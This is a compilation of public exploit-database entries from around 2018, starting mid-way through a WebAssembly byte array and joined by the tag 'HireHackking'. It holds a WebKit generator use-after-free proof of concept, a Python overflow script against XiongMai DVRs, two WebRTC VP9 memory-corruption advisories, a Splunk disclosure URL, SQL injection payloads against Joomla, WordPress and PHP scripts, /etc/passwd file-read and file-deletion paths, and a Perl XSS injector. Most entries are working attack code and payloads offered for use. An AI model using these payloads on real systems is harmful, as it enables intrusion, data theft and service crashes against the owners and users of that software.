b2[99] = 0x47;
b2[100] = 0x2;
b2[101] = 0x6;
b2[102] = 0x0;
b2[103] = 0x41;
b2[104] = 0x2a;
b2[105] = 0x10;
b2[106] = 0x0;
b2[107] = 0xb;
b2[108] = 0x3e;
b2[109] = 0x1;
b2[110] = 0xff;
b2[111] = 0xff;
b2[112] = 0xff;
b2[113] = 0xff;
b2[114] = 0x0f;
b2[115] = 0x7f;
b2[116] = 0x20;
b2[117] = 0x0;
b2[118] = 0x20;
b2[119] = 0x1;
b2[120] = 0x41;
b2[121] = 0x4;
b2[122] = 0x6c;
b2[123] = 0x6a;
b2[124] = 0x21;
b2[125] = 0x2;
b2[126] = 0x2;
b2[127] = 0x40;
b2[128] = 0x3;
b2[129] = 0x40;
b2[130] = 0x20;
b2[131] = 0x0;
b2[132] = 0x20;
b2[133] = 0x2;
b2[134] = 0x46;
b2[135] = 0xd;
b2[136] = 0x1;
b2[137] = 0x41;
b2[138] = 0x2a;
b2[139] = 0x10;
b2[140] = 0x0;
b2[141] = 0x20;
b2[142] = 0x3;
b2[143] = 0x41;
b2[144] = 0xc4;
b2[145] = 0x0;
b2[146] = 0x20;
b2[147] = 0x0;
b2[148] = 0x36;
b2[149] = 0x2;
b2[150] = 0x0;
b2[151] = 0x41;
b2[152] = 0xc4;
b2[153] = 0x0;
b2[154] = 0x6a;
b2[155] = 0x21;
b2[156] = 0x3;
b2[157] = 0x20;
b2[158] = 0x0;
b2[159] = 0x41;
b2[160] = 0x4;
b2[161] = 0x6a;
b2[162] = 0x21;
b2[163] = 0x0;
b2[164] = 0xc;
b2[165] = 0x0;
b2[166] = 0xb;
b2[167] = 0xb;
b2[168] = 0x20;
b2[169] = 0x3;
b2[170] = 0xb;

function f(){print("in f");}
var memory = new WebAssembly.Memory({initial:1, maximum:1});
var mod = new WebAssembly.Module(b2);
var i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}});
i.exports.accumulate.call(0, 5);
HireHackking 
<!--
In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

    var state = this.@generatorState;

and set by calling:

    generator.@generatorState = @GeneratorStateExecuting;


Checking that the @generator property is set is also used in place of type checking the generator.

Therefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.

It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.

Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

var iterator;

var a = [];

function* foo(index) {

  while (1) {
    var q = a.pop();
    if(q){
    	q.__proto__ = iterator;
  	  q.next();
    }
    yield index++;
  }
}

function* foo2(){
    yield;
}

var temp = foo2(0);

for(var i = 0; i < 10; i++){ // make a few objects with @generatorState set
	var q = {};
	q.__proto__ = temp;
	q.next();
	q.__proto__ = {};
	a.push(q);

}

iterator = foo(0);

var q = {};
q.__proto__ = iterator;
print(q.next().value);
-->

<html><body><script>
print = console.log;
print("top");
var iterator;
var o = function(){print("hello")};
var a = [];
function* foo(index) {
  //print("start");

  while (1) {
    //if(index == 77){
      //  o = 0;
       // gc();        
//	index = 2;
  //      var a = [1, 2, 3, 4];
	//yield 9;
        //print("a vale " + a[0]);
    //}
    //if(index == 1){
    //index = 77;
   // print("INTERNAL CALL")
   // iterator.next();
    //index++;

    //}
    //var b = [1, 2, 3, 4];
    var q = a.pop();
    if(q){
    print("here1");
    q.__proto__ = iterator;
    q.next();
    }
    yield index++;
    //print("bval" + b[0]);
  }
}

function* foo2(){

    yield;

}

var temp = foo2(0);

for(var i = 0; i < 10; i++){

	var q = {};
	q.__proto__ = temp;
	q.next();
	q.__proto__ = {};
	a.push(q);

}
//print(a);
iterator = foo(0);


// expected output: 0




o.__proto__ = iterator;
//print("FIRST CALL")
//print(o.next().value);
//print("SECOND CALL")
//print(o.next().value);
//print("THIRD CALL")

for(var i = 0; i < 10; i++){
var q = {};
q.__proto__ = iterator;
print(q.next("hello").value);
}

//print("FOURTH CALL")
//print(iterator.next().value);
o();
</script></body></html>
HireHackking 
# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow
# Date: 2018-06-08           
# Exploit Author: Andrew Watson
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# CVE ID: CVE-2018-10088
# DISCLAIMER: This proof of concept is provided for educational purposes only!
 
#!/usr/bin/python
 
import socket
import sys
 
payload="A" * 85
 
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
 
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <Host>\n"
    sys.exit()
 
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.recv(1024)
s.close()
print "\nExploit complete!"
HireHackking 
There is a missing check in VP9 frame processing that could lead to memory corruption.

In the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::ManageFrameVp9 fetches the GofInfo based on a pic_idx parsed from the incoming packet header. If the incoming frame is of type kVideoFrameKey, find is called on an iterator and the result is used without checking whether the it succeeds.

 if (frame->frame_type() == kVideoFrameKey) {
    ...
    GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;
    FrameReceivedVp9(frame->id.picture_id, &info);
    UnwrapPictureIds(frame);
    return kHandOff;
  }

This can cause a pointer to memory outside the gof_info_ map to be passed to FrameReceivedVp9. This function both reads and writes the info structure.

This issue does not crash reliably, so I recommend reproducing it using an asan build of Chrome. To reproduce the issue:

1) unzip the attached webrtc-from-chat.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send

Chrome should crash in a few seconds.

Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.

This issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.

I recommend fixing this by changing the above code to:

    auto gof_info_it = gof_info_.find(codec_header.tl0_pic_idx);
    if (gof_info_it == gof_info_.end())
        return kDrop;
    GofInfo info = gof_info_it->second;
    FrameReceivedVp9(frame->id.picture_id, &info);

I have verified that this fix would prevent the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44862.zip
HireHackking 
There is a missing check in VP9 frame processing that could lead to memory corruption.

In the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::MissingRequiredFrameVp9 contains the following code:

  size_t temporal_idx = info.gof->temporal_idx[gof_idx];
  ...
  for (size_t l = 0; l < temporal_idx; ++l) {
      ...
      auto missing_frame_it = missing_frames_for_layer_[l].lower_bound(ref_pid);

missing_frames_for_layer_ is a std::array of length kMaxTemporalLayers which equals 5.

Meanwhile, values in the temporal_idx array are read in rtp_format_vp9.cc in the following code:

    RETURN_FALSE_ON_ERROR(parser->ReadBits(&t, 3));
    ...
    vp9->gof.temporal_idx[i] = t;

Reading three bits makes the maximum size of temporal_idx 7, which can go out of bounds of the missing_frames_for_layer_ array.

This issue causes a crash in Chrome. To reproduce the issue.

1) unzip the attached webrtc-from-chat.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send

The attached file 'missingframe' contains the VP9 frame that causes this crash.

Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.

This issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44863.zip
HireHackking 
# Exploit Title: Splunk < 7.0.1 - Information Disclosure
# Date: 2018-05-23
# Exploit Author: KoF2002
# Vendor Homepage: https://www.splunk.com/
# Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED
# Tested on: Linux OS
# CVE : CVE-2018-11409

# Splunk through 6.2.3 7.0.1 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.

# PoC :

https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

# Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back"
HireHackking 
# # # #
# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection 
# Dork: N/A
# Date: 08.06.2018
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extension/ek-rishta/
# Version: 2.10
# Tested on: WiN7_x64/
# video : https://youtu.be/UWGFVUU9AU0
# # # #
# Exploit Author: 41!kh4224rDz
# # # #
# ------------------------------SQL
Injection----------------------------------------
# POC:
# Parameter : user_detail&cid
# Payload : 1%' AND SLEEP(10)%23
#
# 1)
#
http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23
#
#
# # # #
HireHackking 
# Exploit Title: Event Manager PHP Script Admin panel - 'events_new.php' SQL injection
# Date: 2018-06-10
# Exploit Author: telahdihapus
# Vendor Homepage: https://codecanyon.net/user/ezcode
# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741
# Tested on: windows 10

# 1. description :
# Insert data in events_new.php do not use escape string function, 
# so attacker can put qoute character and inject query in insert data.

# 2. POC :
login in admin page http://victim.com/cms/, or you can register admin if you not have, register at http://victim.com/cms/register.

go to http://victim.com/cms/events_new.php

add new title, add some value and press "new type" button. you can see success notice.

now, add payload to value.

example payload = a'), (120, (select version()))-- -

120 is id, you can put your cursor in delete button, to see id, and you can prediction next id.
HireHackking 
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php:    if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:    $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );

# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)

# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists

# VII. Solution
# Disable plugin until a fix is available
HireHackking 
# Exploit Title: Schools Alert Management Script - SQL Injection
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/2
# Tested on: Linux Mint
# CVE: CVE-2018-12055

# Vulnerable cgi:
contact_us.php faq.php about.php photo_gallery.php privacy.php

# Proof of Concept:

POST http://localhost/[PATH]/photo_gallery.php DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#
HireHackking 
# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/6
# Tested on: Linux Mint
# CVE: CVE-2018-12053

# Proof of Concept:

/delete_img.php?img=./uploads/school_logos/1528_x1.php
# notice: There is a risk of file deletion,you'd better test it combined with file upload vulnerability.
# Attackers can delete any file through parameter 'img' with '../' .
HireHackking 
# Exploit Title: userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting
# Date: 2018-06-10
# Author: Dolev Farhi
# Vendor or Software Link: www.userspice.com
# Version: 4.3.24
# Tested on: Ubuntu
# Payload will get executed when admin visits the audit log page

#!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "UserSpice 4.3.24 X-Forwarded-For XSS PoC\n";

if ($#ARGV != 0 ) {
	print "usage: $0 <address> \n";
	exit 1;
}

my $server   = $ARGV[0] . "/users/cron/backup.php?from=users/cron_manager.php/";
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'http://' . $server);

print "Enter payload: ";

my $xff = <STDIN>;
chomp $xff;

if ($xff eq "")
{
 print "Empty payload \n";
 exit 1;
}

$req->header('X-Forwarded-For' => $xff);

my $resp = $ua->request($req);
if ($resp->is_success) {
    print "[OK] Sent payload: $xff\n";
    exit 0;
}
else {
    print "[Error]: code: ", $resp->code, $resp->message, "\n";
    exit 1;
}
HireHackking 
# Exploit Title: Schools Alert Management Script - Arbitrary File Read
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054

# Proof of Concept:

/img.php?f=/./etc/./passwd
HireHackking 
# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/3
# Tested on: Linux Mint
# CVE: CVE-2018-12052

# Proof of Concept:

/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23